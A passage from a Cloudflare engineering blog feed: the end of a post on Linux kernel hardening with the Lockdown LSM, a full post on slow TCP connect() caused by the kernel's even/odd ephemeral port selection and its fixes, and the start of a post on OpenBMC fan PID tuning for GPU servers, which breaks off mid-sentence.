    <p><a href="https://www.kernel.org/doc/html/latest/admin-guide/LSM/index.html">Linux Security Modules (LSM)</a> is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have [covered our usage of another LSM module, BPF-LSM, previously].</p><p>BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — <a href="https://man7.org/linux/man-pages/man7/kernel_lockdown.7.html">the Lockdown LSM</a>. Lockdown can be in three states (controlled by the <code>/sys/kernel/security/lockdown</code> special file):</p>
            <pre><code>ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality</code></pre>
            <p><code>none</code> is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the <code>integrity</code> state, the kernel tries to prevent any operation, which may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (which are mentioned in <a href="https://man7.org/linux/man-pages/man7/kernel_lockdown.7.html">the LSM’s man page</a>), all of which this LSM tries to block. <code>confidentiality</code> is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads as it blocks all runtime debugging capabilities, like <code>perf</code> or eBPF.</p><p>Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is <code>none</code> meaning nothing is locked down:</p>
            <pre><code>ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality</code></pre>
            <p>We can switch the system into the <code>integrity</code> mode:</p>
            <pre><code>ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown
integrity
ignat@dev:~$ cat /sys/kernel/security/lockdown
none [integrity] confidentiality</code></pre>
            <p>It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in <code>integrity</code> mode we can only switch to <code>confidentiality</code> mode, but not back to <code>none</code>:</p>
            <pre><code>ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown
none
tee: /sys/kernel/security/lockdown: Operation not permitted</code></pre>
            <p>Now we can see that even on a stock Debian kernel, which as we discovered above, does not enforce module signatures by default, we cannot load a potentially malicious unsigned kernel module anymore:</p>
            <pre><code>ignat@dev:~$ sudo insmod mymod/mymod.ko
insmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted</code></pre>
            <p>And the kernel log will helpfully point out that this is due to Lockdown LSM:</p>
            <pre><code>ignat@dev:~$ sudo dmesg | tail -n 1
[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7</code></pre>
            <p>As we can see, Lockdown LSM helps to tighten the security of a kernel, which otherwise may not have other enforcing bits enabled, like the stock Debian one.</p><p>If you compile your own kernel, you can go one step further and set <a href="https://elixir.bootlin.com/linux/v6.6.17/source/security/lockdown/Kconfig#L33">the initial state of the Lockdown LSM to be more restrictive than none from the start</a>. This is exactly what we did for the Cloudflare production kernel:</p>
            <pre><code>ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9
# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set
CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y
# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set</code></pre>
            
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.</p>
    <div>
      <h2>Watch on Cloudflare TV</h2>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p>Tune in for more news, announcements and thought-provoking discussions! Don't miss the full <a href="https://cloudflare.tv/shows/security-week">Security Week hub page</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Kernel]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">3ySkqS53T1nhzX61XzJFEG</guid>
            <dc:creator>Ignat Korchagin</dc:creator>
        </item>
        <item>
            <title><![CDATA[connect() - why are you so slow?]]></title>
            <link>https://blog.cloudflare.com/linux-transport-protocol-port-selection-performance/</link>
            <pubDate>Thu, 08 Feb 2024 14:00:27 GMT</pubDate>
            <description><![CDATA[ This is our story of what we learned about the connect() implementation for TCP in Linux. Both its strong and weak points. How connect() latency changes under pressure, and how to open connection so that the syscall latency is deterministic and time-bound ]]></description>
            <content:encoded><![CDATA[ <p></p><p>It is no secret that Cloudflare is encouraging companies to deprecate their use of IPv4 addresses and move to IPv6 addresses. We have a couple articles on the subject from this year:</p><ul><li><p><a href="/amazon-2bn-ipv4-tax-how-avoid-paying/">Amazon’s $2bn IPv4 tax – and how you can avoid paying it</a></p></li><li><p><a href="/ipv6-from-dns-pov/">Using DNS to estimate worldwide state of IPv6 adoption</a></p></li></ul><p>And many more in our <a href="/searchresults#q=IPv6&amp;sort=date%20descending&amp;f:@customer_facing_source=[Blog]&amp;f:@language=[English]">catalog</a>. To help with this, we spent time this last year investigating and implementing infrastructure to reduce our internal and egress use of IPv4 addresses. We prefer to re-allocate our addresses than to purchase more due to increasing costs. And in this effort we discovered that our cache service is one of our bigger consumers of IPv4 addresses. Before we remove IPv4 addresses for our cache services, we first need to understand how cache works at Cloudflare.</p>
    <div>
      <h2>How does cache work at Cloudflare?</h2>
      <a href="#how-does-cache-work-at-cloudflare">
        
      </a>
    </div>
    <p>Describing the full scope of the <a href="https://developers.cloudflare.com/reference-architecture/cdn-reference-architecture/#cloudflare-cdn-architecture-and-design">architecture</a> is out of scope of this article, however, we can provide a basic outline:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70ULgxsqU4zuyWYVrNn6et/8c80079d6dd93083059a875bbf48059d/image1-2.png" />
            
            </figure><ol><li><p>Internet User makes a request to pull an asset</p></li><li><p>Cloudflare infrastructure routes that request to a handler</p></li><li><p>Handler machine returns cached asset, or if miss</p></li><li><p>Handler machine reaches to origin server (owned by a customer) to pull the requested asset</p></li></ol><p>The particularly interesting part is the cache miss case. When a website suddenly becomes very popular, many uncached assets may need to be fetched all at once. Hence we may make an upwards of: 50k TCP unicast connections to a single destination_._</p><p>That is a lot of connections! We have strategies in place to limit the impact of this or avoid this problem altogether. But in these rare cases when it occurs, we will then balance these connections over two source IPv4 addresses.</p><p>Our goal is to remove the load balancing and prefer one IPv4 address. To do that, we need to understand the performance impact of two IPv4 addresses vs one.</p>
    <div>
      <h2>TCP connect() performance of two source IPv4 addresses vs one IPv4 address</h2>
      <a href="#tcp-connect-performance-of-two-source-ipv4-addresses-vs-one-ipv4-address">
        
      </a>
    </div>
    <p>We leveraged a tool called <a href="https://github.com/wg/wrk">wrk</a>, and modified it to distribute connections over multiple source IP addresses. Then we ran a workload of 70k connections over 48 threads for a period of time.</p><p>During the test we measured the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/tcp_ipv4.c#L201">tcp_v4_connect()</a> with the BPF BCC libbpf-tool <a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c">funclatency</a> tool to gather latency metrics as time progresses.</p><p>Note that throughout the rest of this article, all the numbers are specific to a single machine with no production traffic. We are making the assumption that if we can improve a worse case scenario in an algorithm with a best case machine, that the results could be extrapolated to production. Lock contention was specifically taken out of the equation, but will have production implications.</p>
    <div>
      <h3>Two IPv4 addresses</h3>
      <a href="#two-ipv4-addresses">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1q7v3WNgI5X3JQg5ua0B8g/5b557ca762a08422badae379233dee76/image6.png" />
            
            </figure><p>The y-axis are buckets of nanoseconds in powers of ten. The x-axis represents the number of connections made per bucket. Therefore, more connections in a lower power of ten buckets is better.</p><p>We can see that the majority of the connections occur in the fast case with roughly ~20k in the slow case. We should expect this bimodal to increase over time due to wrk continuously closing and establishing connections.</p><p>Now let us look at the performance of one IPv4 address under the same conditions.</p>
    <div>
      <h3>One IPv4 address</h3>
      <a href="#one-ipv4-address">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6kpueuXS3SbBTIig306IDN/b27ab899656fbfc0bf3c885a44fb04a4/image8.png" />
            
            </figure><p>In this case, the bimodal distribution is even more pronounced. Over half of the total connections are in the slow case than in the fast! We may conclude that simply switching to one IPv4 address for cache egress is going to introduce significant latency on our connect() syscalls.</p><p>The next logical step is to figure out where this bottleneck is happening.</p>
    <div>
      <h2>Port selection is not what you think it is</h2>
      <a href="#port-selection-is-not-what-you-think-it-is">
        
      </a>
    </div>
    <p>To investigate this, we first took a flame graph of a production machine:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1tFwadYDdC5UVK78j4yKsv/64aca09189acba5bf3dab2e043265e0f/image7.png" />
            
            </figure><p>Flame graphs depict a run-time function call stack of a system. Y-axis depicts call-stack depth, and x-axis depicts a function name in a horizontal bar that represents the amount of times the function was sampled. Checkout this in-depth <a href="https://www.brendangregg.com/flamegraphs.html">guide</a> about flame graphs for more details.</p><p>Most of the samples are taken in the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1000"><code>__inet_hash_connect()</code></a>. We can see that there are also many samples for <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L544"><code>__inet_check_established()</code></a> with some lock contention sampled between. We have a better picture of a potential bottleneck, but we do not have a consistent test to compare against.</p><p>Wrk introduces a bit more variability than we would like to see. Still focusing on the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/tcp_ipv4.c#L201"><code>tcp_v4_connect()</code></a>, we performed another synthetic test with a homegrown benchmark tool to test one IPv4 address. A tool such as <a href="https://github.com/ColinIanKing/stress-ng">stress-ng</a> may also be used, but some modification is necessary to implement the socket option <a href="https://man7.org/linux/man-pages/man7/ip.7.html"><code>IP_LOCAL_PORT_RANGE</code></a>. There is more about that socket option later.</p><p>We are now going to ensure a deterministic amount of connections, and remove lock contention from the problem. The result is something like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5d6tJum5BBe3jsLRqhXtFN/7952fb3d0a3da761de158fae4f925eb5/Screenshot-2024-02-07-at-15.54.29.png" />
            
            </figure><p>On the y-axis we measured the latency between the start and end of a connect() syscall. The x-axis denotes when a connect() was called. Green dots are even numbered ports, and red dots are odd numbered ports. The orange line is a linear-regression on the data.</p><p>The disparity between the average time for port allocation between even and odd ports provides us with a major clue. Connections with odd ports are found significantly slower than the even. Further, odd ports are not interleaved with earlier connections. This implies we exhaust our even ports before attempting the odd. The chart also confirms our bimodal distribution.</p>
    <div>
      <h3>__inet_hash_connect()</h3>
      <a href="#__inet_hash_connect">
        
      </a>
    </div>
    <p>At this point we wanted to understand this split a bit better. We know from the flame graph and the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1000"><code>__inet_hash_connect()</code></a> that this holds the algorithm for port selection. For context, this function is responsible for associating the socket to a source port in a late bind. If a port was previously provided with bind(), the algorithm just tests for a unique TCP 4-tuple (src ip, src port, dest ip, dest port) and ignores port selection.</p><p>Before we dive in, there is a little bit of setup work that happens first. Linux first generates a time-based hash that is used as the basis for the starting port, then adds randomization, and then puts that information into an offset variable. This is always set to an even integer.</p><p><a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1043">net/ipv4/inet_hashtables.c</a></p>
            <pre><code>   offset &amp;= ~1U;
    
other_parity_scan:
    port = low + offset;
    for (i = 0; i &lt; remaining; i += 2, port += 2) {
        if (unlikely(port &gt;= high))
            port -= remaining;

        inet_bind_bucket_for_each(tb, &amp;head-&gt;chain) {
            if (inet_bind_bucket_match(tb, net, port, l3mdev)) {
                if (!check_established(death_row, sk, port, &amp;tw))
                    goto ok;
                goto next_port;
            }
        }
    }

    offset++;
    if ((offset &amp; 1) &amp;&amp; remaining &gt; 1)
        goto other_parity_scan;</code></pre>
            <p>Then in a nutshell: loop through one half of ports in our range (all even or all odd ports) before looping through the other half of ports (all odd or all even ports respectively) for each connection. Specifically, this is a variation of the <a href="https://datatracker.ietf.org/doc/html/rfc6056#section-3.3.4">Double-Hash Port Selection Algorithm</a>. We will ignore the bind bucket functionality since that is not our main concern.</p><p>Depending on your port range, you either start with an even port or an odd port. In our case, our low port, 9024, is even. Then the port is picked by adding the offset to the low port:</p><p><a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1045">net/ipv4/inet_hashtables.c</a></p>
            <pre><code>port = low + offset;</code></pre>
            <p>If low was odd, we will have an odd starting port because odd + even = odd.</p><p>There is a bit too much going on in the loop to explain in text. I have an example instead:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6uVqtAUR07epRRKqQbHWkp/2a5671b1dd3c68c012e7171b8103a53e/image5.png" />
            
            </figure><p>This example is bound by 8 ports and 8 possible connections. All ports start unused. As a port is used up, the port is grayed out. Green boxes represent the next chosen port. All other colors represent open ports. Blue arrows are even port iterations of offset, and red are the odd port iterations of offset. Note that the offset is randomly picked, and once we cross over to the odd range, the offset is incremented by one.</p><p>For each selection of a port, the algorithm then makes a call to the function <code>check_established()</code> which dereferences <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L544"><code>__inet_check_established()</code></a>. This function loops over sockets to verify that the TCP 4-tuple is unique. The takeaway is that the socket list in the function is usually smaller than not. This grows as more unique TCP 4-tuples are introduced to the system. Longer socket lists may slow down port selection eventually. We have a blog post on <a href="/how-to-stop-running-out-of-ephemeral-ports-and-start-to-love-long-lived-connections/">ephemeral port exhausting</a> that dives into the socket list and port uniqueness criteria.</p><p>At this point, we can summarize that the odd/even port split is what is causing our performance bottleneck. And during the investigation, it was not obvious to me (or even maybe you) why the offset was initially calculated the way it was, and why the odd/even port split was introduced. After some git-archaeology the decisions become more clear.</p>
    <div>
      <h3>Security considerations</h3>
      <a href="#security-considerations">
        
      </a>
    </div>
    <p>Port selection has been shown to be used in device <a href="https://lwn.net/Articles/910435/">fingerprinting</a> in the past. This led the authors to introduce more randomization into the initial port selection. Prior, ports were predictably picked solely based on their initial hash and a salt value which does not change often. This helps with explaining the offset, but does not explain the split.</p>
    <div>
      <h3>Why the even/odd split?</h3>
      <a href="#why-the-even-odd-split">
        
      </a>
    </div>
    <p>Prior to this <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=07f4c90062f8fc7c8c26f8f95324cbe8fa3145a5">patch</a> and that <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1580ab63fc9a03593072cc5656167a75c4f1d173">patch</a>, services may have conflicts between the connect() and bind() heavy workloads. Thus, to avoid those conflicts, the split was added. An even offset was chosen for the connect() workloads, and an odd offset for the bind() workloads. However, we can see that the split works great for connect() workloads that do not exceed one half of the allotted port range.</p><p>Now we have an explanation for the flame graph and charts. So what can we do about this?</p>
    <div>
      <h2>User space solution (kernel &lt; 6.8)</h2>
      <a href="#user-space-solution-kernel-6-8">
        
      </a>
    </div>
    <p>We have a couple of strategies that would work best for us. Infrastructure or architectural strategies are not considered due to significant development effort. Instead, we prefer to tackle the problem where it occurs.</p><h3>Select, test, repeat<p>For the “select, test, repeat” approach, you may have code that ends up looking like this:</p>
            <pre><code>sys = get_ip_local_port_range()
estab = 0
i = sys.hi
while i &gt;= 0:
    if estab &gt;= sys.hi:
        break

    random_port = random.randint(sys.lo, sys.hi)
    connection = attempt_connect(random_port)
    if connection is None:
        i += 1
        continue

    i -= 1
    estab += 1</code></pre>
            <p>The algorithm simply loops through the system port range, and randomly picks a port each iteration. Then test that the connect() worked. If not, rinse and repeat until range exhaustion.</p><p>This approach is good for up to ~70-80% port range utilization. And this may take roughly eight to twelve attempts per connection as we approach exhaustion. The major downside to this approach is the extra syscall overhead on conflict. In order to reduce this overhead, we can consider another approach that allows the kernel to still select the port for us.</p><h3>Select port by random shifting range<p>This approach leverages the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=91d0b78c5177f3e42a4d8738af8ac19c3a90d002"><code>IP_LOCAL_PORT_RANGE</code></a> socket option. And we were able to achieve performance like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Uz8whp12VuvqvKTDnE1u9/4701177d739bdffe2a2399213cf72941/Screenshot-2024-02-07-at-16.00.22.png" />
            
            </figure><p>That is much better! The chart also introduces black dots that represent errored connections. However, they have a tendency to clump at the very end of our port range as we approach exhaustion. This is not dissimilar to what we may see in “<a href="#selecttestrepeat">select, test, repeat</a>”.</p><p>The way this solution works is something like:</p>
            <pre><code>IP_BIND_ADDRESS_NO_PORT = 24
IP_LOCAL_PORT_RANGE = 51
sys = get_local_port_range()
window.lo = 0
window.hi = 1000
range = window.hi - window.lo
offset = randint(sys.lo, sys.hi - range)
window.lo = offset
window.hi = offset + range

sk = socket(AF_INET, SOCK_STREAM)
sk.setsockopt(IPPROTO_IP, IP_BIND_ADDRESS_NO_PORT, 1)
range = pack("@I", window.lo | (window.hi &lt;&lt; 16))
sk.setsockopt(IPPROTO_IP, IP_LOCAL_PORT_RANGE, range)
sk.bind((src_ip, 0))
sk.connect((dest_ip, dest_port))</code></pre>
            <p>We first fetch the system's local port range, define a custom port range, and then randomly shift the custom range within the system range. Introducing this randomization helps the kernel to start port selection randomly at an odd or even port. Then reduces the loop search space down to the range of the custom window.</p><p>We tested with a few different window sizes, and determined that a five hundred or one thousand size works fairly well for our port range:</p>
<table>
<thead>
  <tr>
    <th><span>Window size</span></th>
    <th><span>Errors</span></th>
    <th><span>Total test time</span></th>
    <th><span>Connections/second</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>500</span></td>
    <td><span>868</span></td>
    <td><span>~1.8 seconds</span></td>
    <td><span>~30,139</span></td>
  </tr>
  <tr>
    <td><span>1,000</span></td>
    <td><span>1,129</span></td>
    <td><span>~2 seconds</span></td>
    <td><span>~27,260</span></td>
  </tr>
  <tr>
    <td><span>5,000</span></td>
    <td><span>4,037</span></td>
    <td><span>~6.7 seconds</span></td>
    <td><span>~8,405</span></td>
  </tr>
  <tr>
    <td><span>10,000</span></td>
    <td><span>6,695</span></td>
    <td><span>~17.7 seconds</span></td>
    <td><span>~3,183</span></td>
  </tr>
</tbody>
</table><p>As the window size increases, the error rate increases. That is because a larger window provides less random offset opportunity. A max window size of 56,512 is no different from using the kernels default behavior. Therefore, a smaller window size works better. But you do not want it to be too small either. A window size of one is no different from “<a href="#selecttestrepeat">select, test, repeat</a>”.</p><p>In kernels &gt;= 6.8, we can do even better.</p><h2>Kernel solution (kernel &gt;= 6.8)</h2><p>A new <a href="https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net-next.git/commit/?id=207184853dbd">patch</a> was introduced that eliminates the need for the window shifting. This solution is going to be available in the 6.8 kernel.</p><p>Instead of picking a random window offset for <code>setsockopt(IPPROTO_IP, IP_LOCAL_PORT_RANGE</code>, …), like in the previous solution, we instead just pass the full system port range to activate the solution. The code may look something like this:</p>
            <pre><code>IP_BIND_ADDRESS_NO_PORT = 24
IP_LOCAL_PORT_RANGE = 51
sys = get_local_port_range()
sk = socket(AF_INET, SOCK_STREAM)
sk.setsockopt(IPPROTO_IP, IP_BIND_ADDRESS_NO_PORT, 1)
range = pack("@I", sys.lo | (sys.hi &lt;&lt; 16))
sk.setsockopt(IPPROTO_IP, IP_LOCAL_PORT_RANGE, range)
sk.bind((src_ip, 0))
sk.connect((dest_ip, dest_port))</code></pre>
            <p>Setting <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=91d0b78c5177f3e42a4d8738af8ac19c3a90d002"><code>IP_LOCAL_PORT_RANGE</code></a> option is what tells the kernel to use a similar approach to “<a href="#random">select port by random shifting range</a>” such that the start offset is randomized to be even or odd, but then loops incrementally rather than skipping every other port. We end up with results like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ttWStZgNYfwftr71r8Vrt/7c333411ef01b674cc839f27ae4cbbbf/Screenshot-2024-02-07-at-16.04.24.png" />
            
            </figure><p>The performance of this approach is quite comparable to our user space implementation. Albeit, a little faster. Due in part to general improvements, and that the algorithm can always find a port given the full search space of the range. Then there are no cycles wasted on a potentially filled sub-range.</p><p>These results are great for TCP, but what about other protocols?</p>
    <div>
      <h2>Other protocols &amp; connect()</h2>
      <a href="#other-protocols-connect">
        
      </a>
    </div>
    <p>It is worth mentioning at this point that the algorithms used for the protocols are <i>mostly</i> the same for IPv4 &amp; IPv6. Typically, the key difference is how the sockets are compared to determine uniqueness and where the port search happens. We did not compare performance for all protocols. But it is worth mentioning some similarities and differences with TCP and a couple of others.</p>
    <div>
      <h3>DCCP</h3>
      <a href="#dccp">
        
      </a>
    </div>
    <p>The DCCP protocol leverages the same port selection <a href="https://elixir.bootlin.com/linux/v6.6/source/net/dccp/ipv4.c#L115">algorithm</a> as TCP. Therefore, this protocol benefits from the recent kernel changes. It is also possible the protocol could benefit from our user space solution, but that is untested. We will let the reader exercise DCCP use-cases.</p>
    <div>
      <h3>UDP &amp; UDP-Lite</h3>
      <a href="#udp-udp-lite">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/learning/ddos/glossary/user-datagram-protocol-udp/">UDP</a> leverages a different algorithm found in the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/udp.c#L239"><code>udp_lib_get_port()</code></a>. Similar to TCP, the algorithm will loop over the whole port range space incrementally. This is only the case if the port is not already supplied in the bind() call. The key difference between UDP and TCP is that a random number is generated as a step variable. Then, once a first port is identified, the algorithm loops on that port with the random number. This relies on an uint16_t overflow to eventually loop back to the chosen port. If all ports are used, increment the port by one and repeat. There is no port splitting between even and odd ports.</p><p>The best comparison to the TCP measurements is a UDP setup similar to:</p>
            <pre><code>sk = socket(AF_INET, SOCK_DGRAM)
sk.bind((src_ip, 0))
sk.connect((dest_ip, dest_port))</code></pre>
            <p>And the results should be unsurprising with one IPv4 source address:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4UM5d0RBTgqADgVLbbqMlQ/940306c90767ba4b5e3762c6467b71ed/Screenshot-2024-02-07-at-16.06.27.png" />
            
            </figure><p>UDP fundamentally behaves differently from TCP. And there is less work overall for port lookups. The outliers in the chart represent a worst-case scenario when we reach a fairly bad random number collision. In that case, we need to more-completely loop over the ephemeral range to find a port.</p><p>UDP has another problem. Given the socket option <code>SO_REUSEADDR</code>, the port you get back may conflict with another UDP socket. This is in part due to the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/udp.c#L141"><code>udp_lib_lport_inuse()</code></a> ignoring the UDP 2-tuple (src ip, src port) check given the socket option. When this happens you may have a new socket that overwrites a previous. Extra care is needed in that case. We wrote more in depth about these cases in a previous <a href="/how-to-stop-running-out-of-ephemeral-ports-and-start-to-love-long-lived-connections/">blog post</a>.</p>
    <div>
      <h2>In summary</h2>
      <a href="#in-summary">
        
      </a>
    </div>
    <p>Cloudflare can make a lot of unicast egress connections to origin servers with popular uncached assets. To avoid port-resource exhaustion, we balance the load over a couple of IPv4 source addresses during those peak times. Then we asked: “what is the performance impact of one IPv4 source address for our connect()-heavy workloads?”. Port selection is not only difficult to get right, but is also a performance bottleneck. This is evidenced by measuring connect() latency with a flame graph and synthetic workloads. That then led us to discovering TCP’s quirky port selection process that loops over half your ephemeral ports before the other for each connect().</p><p>We then proposed three solutions to solve the problem outside of adding more IP addresses or other architectural changes: “<a href="#selecttestrepeat">select, test, repeat</a>”, “<a href="#random">select port by random shifting range</a>”, and an <a href="https://man7.org/linux/man-pages/man7/ip.7.html"><code>IP_LOCAL_PORT_RANGE</code></a> socket option <a href="#kernel">solution</a> in newer kernels. And finally closed out with other protocol honorable mentions and their quirks.</p><p>Do not take our numbers! Please explore and measure your own systems. With a better understanding of your workloads, you can make a good decision on which strategy works best for your needs. Even better if you come up with your own strategy!</p></h3></h3> ]]></content:encoded>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Protocols]]></category>
            <category><![CDATA[Performance]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[IPv4]]></category>
            <category><![CDATA[IPv6]]></category>
            <category><![CDATA[Network]]></category>
            <guid isPermaLink="false">1C6z0btasEsz1cmdmoug0m</guid>
            <dc:creator>Frederick Lawler</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we used OpenBMC to support AI inference on GPUs around the world]]></title>
            <link>https://blog.cloudflare.com/how-we-used-openbmc-to-support-ai-inference-on-gpus-around-the-world/</link>
            <pubDate>Wed, 06 Dec 2023 14:00:34 GMT</pubDate>
            <description><![CDATA[ This is what Cloudflare has been able to do so far with OpenBMC with respect to our GPU-equipped servers ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3JeLifbB3Vdk6jqpeUpVRc/1647ed581b63f4f196194655e8c286d1/2148-HERO.png" />
            
            </figure><p>Cloudflare recently announced <a href="/workers-ai/">Workers AI</a>, giving developers the ability to run serverless GPU-powered AI inference on Cloudflare’s global network. One key area of focus in enabling this across our network was updating our Baseboard Management Controllers (BMCs). The BMC is an embedded microprocessor that sits on most servers and is responsible for remote power management, sensors, serial console, and other features such as virtual media.</p><p>To efficiently manage our BMCs, Cloudflare leverages OpenBMC, an open-source firmware stack from the Open Compute Project (OCP). For Cloudflare, OpenBMC provides transparent, auditable firmware. Below describes some of what Cloudflare has been able to do so far with OpenBMC with respect to our GPU-equipped servers.</p>
    <div>
      <h2>Ouch! That’s HOT!</h2>
      <a href="#ouch-thats-hot">
        
      </a>
    </div>
    <p>For this project, we needed a way to adjust our BMC firmware to accommodate new GPUs, while maintaining the operational efficiency with respect to thermals and power consumption. OpenBMC was a powerful tool in meeting this objective.</p><p>OpenBMC allows us to change the hardware of our existing servers without the dependency of our Original Design Manufacturers (ODMs), consequently allowing our product teams to get started on products quickly. To physically support this effort, our servers need to be able to supply enough power and keep the GPU and the rest of the chassis within operating temperatures. Our servers had power supplies that had sufficient power to support new GPUs as well as the rest of the server’s chassis, so we were primarily concerned with ensuring they had sufficient cooling.</p><p>With OpenBMC, our first approach to enabling our product teams to start working with the GPUs was to simply blast fans directly in line with the GPU, assuming the GPU was running at Thermal Design Power (TDP, the maximum heat from a given source). Unfortunately, because of the heat given off by these new GPUs, we could not keep them below 95˚C when they were fully stressed. This prompted us to install another fan to help keep the GPU cool and helped us bring a fully stressed GPU down to 65˚C. This served as our baseline before we began the process of fine-tuning the fan Peripheral Integral Derivative (PID) controller to handle variation in temperature in a more nuanced manner. Below shows a graph of the baseline described above:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1r06acJOE7ZIuVP4jrCnqz/543e4e015d4a7de22f35800a9b4a80f4/2148-1.png" />
            
            </figure><p>With this baseline in place, tuning becomes a tedious iteration of PID constants. For those unfamiliar with PID controllers, we use the following equation to describe the control output given the error as input.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Ooby3NUPSj7MFRmkYpesl/8d63ee010e49d6f350a76b23d50862dc/Screenshot-2023-12-05-at-15.31.01.png" />
            
            </figure><p>To break this down, u(t) represents our control output, e(t) is the error signal, and Kp, Ki, and Kd are the proportional gain, integral gain, and derivative gain constants, respectively. To briefly describe how each of these components work, I will isolate each of the components. Our error, or e(t), is simply the difference between the target temperature and the current temperature, so if our target temperature is 50 ˚C and my current is 60 ˚C, the e(t) for the proportional component is 10 ˚C. If u(t) = Kp⋅e(t), we can see that u(t) is = Kp⋅10. Any given Kp could drastically affect the control output u(t) and is responsible for how quickly the controller adjusts to approaching the target. The Ki⋅∫e(t)dt accumulates the error over time. The scenario where the controller reaches steady state but does not hit the target setpoint is called steady-state error. The integral component accumulating that error is intended for resolving this scenario but can also cause oscillations if the integral gain is too large. Lastly, the derivative portion, Kd⋅∂e(t)/∂t, can be seen as Kd⋅(the slope at the given point in time). You can imagine that the more quickly the controller approaches the target, the greater the slope, and the slower the approach, the less slope. Another way to look at it is that with faster oscillations, the greater the derivative portion, and slower oscillations, the lesser the derivative portion.</p><p>With this in mind, the following points are taken into consideration when we manually tune the controller:</p><ol><li><p>Avoid oscillations at the target setpoint, i.e. avoid letting the temperature fluctuate above or below the specified temperature. Oscillations — specifically variations of fan speed and pulse width modulation (generally the power supplied to the fan), increase mechanical wear on components. We want these servers to last the entire five-year lifecycle while also not costing us capital expenses for replacing components or operating expenses in terms of the electricity we expend.</p></li><li><p>Approach the target setpoint as quickly as possible — with the above graph, we see the temperature settle somewhere between 63 ˚C and 65 ˚C quickly, but that’s because the fans are currently at 100% load. Settling at the target setpoint quickly means our fans are able to quickly adjust to the heat expended by the GPU or any component.</p></li><li><p>The proportional gain affects how quickly the controller approaches the setpoints</p></li><li><p>The integral gain is used to remove steady-state errors.</p></li><li><p>The derivative gain is based of the rate of change and is used to remove oscillations</p></li></ol><p>With a better understanding of the PID controller theory, we can see how we can iterate toward our final product. Our initial trial from a full load fan had some difficulties finding the setpoints, as shown by the oscillations on the left side of the graph. As we learned above, by adjusting our integral and derivative gains we were able to help reduce the oscillations. We can see the controller trying to lock in around the 